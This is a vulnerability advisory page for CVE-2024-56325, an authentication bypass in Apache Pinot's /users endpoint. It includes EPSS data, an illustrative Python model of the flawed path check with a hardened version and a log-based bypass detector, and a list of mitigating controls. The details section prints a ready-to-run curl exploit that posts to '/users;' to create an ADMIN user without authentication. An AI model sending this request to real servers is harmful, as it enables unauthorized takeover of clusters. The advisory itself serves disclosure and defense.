CVE-2024-56325
Published: 01 April 2025
Summary
CVE-2024-56325 is a critical-severity Authentication Bypass Using an Alternate Path or Channel (CWE-288) vulnerability in Apache Pinot. Its CVSS base score is 9.8 (Critical).
Operationally, it ranks in the top 4.8% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog.
Deeper analysis
CVE-2024-56325 is an authentication bypass vulnerability affecting Apache Pinot. The flaw occurs in request path handling for the /users endpoint, where authentication is skipped if the path lacks a forward slash or contains a dot character. This allows unauthenticated creation of new users with arbitrary roles such as ADMIN on the CONTROLLER component.
An unauthenticated remote attacker can exploit the issue by submitting a POST request to a crafted endpoint such as /users; or /users;. (note the trailing semicolon, optionally followed by a dot), supplying JSON that defines a new administrative user. Successful exploitation grants full control over the Pinot cluster, including the ability to manage tables, permissions, and other components, consistent with the CVSS 9.8 rating and CWE-288 classification.
The associated EPSS score rose from a low baseline to a peak of 0.3077 on 2026-02-04 before receding to the current value of 0.1741, indicating increased exploitation interest after disclosure. Official advisories and patches are discussed in the Apache announcement at lists.apache.org/thread/ksf8qsndr1h66otkbjz2wrzsbw992r8v and the oss-security posting from March 2025.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2025-9317
Vulnerability details
Authentication Bypass Issue: if the path does not contain '/' and contains '.', authentication is not required.
Expected normal request and response example:
curl -X POST -H "Content-Type: application/json" -d '{"username":"hack2","password":"hack","component":"CONTROLLER","role":"ADMIN","tables":[],"permissions":[],"usernameWithComponent":"hack_CONTROLLER"}' http://{server_ip}:9000/users
Return: {"code":401,"error":"HTTP 401 Unauthorized"}
Malicious request and response example:
curl -X POST -H "Content-Type: application/json" -d '{"username":"hack","password":"hack","component":"CONTROLLER","role":"ADMIN","tables":[],"permissions":[],"usernameWithComponent":"hack_CONTROLLER"}' 'http://{serverip}:9000/users;' (or 'http://{serverip}:9000/users;.')
Return: {"users":{}}
A new user gets added, bypassing authentication and enabling the user to control Pinot.
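The following is an added illustration of the weakness pattern the advisory describes; it is not Apache Pinot's code. It models the exemption rule exactly as stated above (a request path with no '/' and a '.' is treated as a static asset and skips authentication), places a canonicalising, deny-by-default version beside it, and runs a detection check over constructed access-log lines that flags the raw-path/canonical-path mismatch this class of bypass produces. The function names, the policy table and the log samples are all hypothetical.

```python
"""Added illustration of the CWE-288 pattern described for CVE-2024-56325.
This is NOT Apache Pinot code: the filter below models the exemption rule
exactly as the advisory states it (a path with no '/' and a '.' is treated
as a static asset and skips authentication), then shows a canonicalising,
deny-by-default version and a log check for the bypass pattern.
All function names, the policy table and the log lines are hypothetical."""
import re
from urllib.parse import unquote

# Hypothetical policy: endpoints that must always be authenticated.
PROTECTED_PREFIXES = ("/users", "/tables", "/cluster")
# Hypothetical allow-list of unauthenticated static assets.
STATIC_ALLOW = ("/", "/index.html")


def flawed_requires_auth(raw_path: str) -> bool:
    """The described weak rule, evaluated on the raw request path."""
    p = raw_path.lstrip("/")
    if "/" not in p and "." in p:
        return False      # "looks like a file" -> auth skipped (the flaw)
    return True


def canonical_path(raw_path: str) -> str:
    """Canonicalise before any security decision: percent-decode once,
    strip matrix parameters (';...') from each segment, resolve '.' and
    '..' segments and collapse empty segments."""
    out = []
    for seg in unquote(raw_path).split("/"):
        seg = seg.split(";", 1)[0]   # drop ';key=value' matrix parameters
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)


def hardened_requires_auth(raw_path: str) -> bool:
    """Deny by default: decide on the canonical path and exempt only an
    explicit allow-list of static assets, never a protected endpoint."""
    path = canonical_path(raw_path)
    if path.startswith(PROTECTED_PREFIXES):
        return True
    return path not in STATIC_ALLOW


# Constructed access-log samples (common log format), not real traffic.
LOG_LINES = [
    '10.0.0.5 - - [01/Apr/2025:10:00:00 +0000] "POST /users HTTP/1.1" 401 45',
    '10.0.0.9 - - [01/Apr/2025:10:00:07 +0000] "POST /users;. HTTP/1.1" 200 12',
    '10.0.0.9 - - [01/Apr/2025:10:00:09 +0000] "POST /users; HTTP/1.1" 200 12',
    '10.0.0.7 - - [01/Apr/2025:10:01:00 +0000] "GET /index.html HTTP/1.1" 200 812',
]
REQ = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def suspicious_requests(lines):
    """Flag requests whose raw path differs from its canonical form while
    resolving to a protected endpoint: that mismatch is the signature of a
    matrix-parameter or dot-segment bypass. Returns (raw, canonical, status)
    so a 2xx status can be escalated as a probable successful bypass."""
    hits = []
    for line in lines:
        m = REQ.search(line)
        if not m:
            continue
        raw, canon = m["path"], canonical_path(m["path"])
        if raw != canon and canon.startswith(PROTECTED_PREFIXES):
            hits.append((raw, canon, m["status"]))
    return hits


if __name__ == "__main__":
    for p in ("/users", "/users;.", "/index.html"):
        print(f"{p:12} flawed={flawed_requires_auth(p)} hardened={hardened_requires_auth(p)}")
    for hit in suspicious_requests(LOG_LINES):
        print("bypass pattern:", hit)
```

The design point is that the authentication decision must be made on the same canonical resource the router dispatches to, not on the raw request string, and that exemptions should be an explicit allow-list rather than a heuristic such as "contains a dot". On the detection side, any request to a protected endpoint whose raw path carries a ';' or dot segment deserves review, and one that returned 2xx should be treated as a probable successful bypass until the user list is checked.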
Related Threats
No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.
Affected Assets
Mitigating Controls
Likely Mitigating Controls AI
Per-CVE control mapping for this CVE has not run yet; the list below is derived from the weakness types (CWEs) cited in the NVD entry.
- Authorizing remote access, and rejecting unauthorized remote channels, reduces the ability to bypass authentication via an alternate remote channel.
- Showing users their previous logon time lets them identify logons made via alternate paths or channels.
- Adaptive authentication requirements applied across all access paths reduce the ability to bypass authentication via an alternate channel or path.
- A centralized identity provider (IdP) closes alternate authentication paths that enable bypass.
- Enforcing authentication for non-organizational users makes bypass via alternate paths or channels harder.
- Requiring authentication to occur exclusively over an isolated trusted path directly prevents bypass via alternate or untrusted channels.